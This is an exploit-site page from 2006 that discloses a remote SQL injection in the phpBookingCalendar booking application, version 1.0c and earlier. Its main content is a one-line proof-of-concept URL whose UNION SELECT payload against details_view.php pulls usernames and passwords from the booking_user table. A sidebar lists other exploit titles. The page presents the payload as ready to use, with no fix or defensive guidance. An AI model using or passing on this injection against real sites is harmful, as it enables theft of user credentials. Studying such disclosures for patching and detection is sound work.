exploits , vulnerabilities , articles , phpBookingCalendar <= 1.0c [details

2006-03-25

phpBookingCalendar <= 1.0c [details_view.php] Remote SQL Injection

Rated as : High Risk

PoC by undefined1_ @ bash-x.net/undef/

phpBookingCalendar <= 1.0c
"A PHP/MySQL Booking Calendar Application."
http://www.jjwdesign.com/booking_calendar.html

phpBookingCalendar is prone to a sql injection attack. the sql injection
works regardless of any magic_quotes_gpc settings.
www.site.com/details_view.php?event_id=1 and 1=0 union all select
1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user
securitydot.net - 2006-03-25

Exploits - newest 10 RSS | More

2007-06-15 57273 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34205 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42430 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29330 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19770 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16707 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19406 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16594 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33608 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17232 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit

exploits , vulnerabilities , articles , phpBookingCalendar <= 1.0c [details_view.php] Remote SQL Injection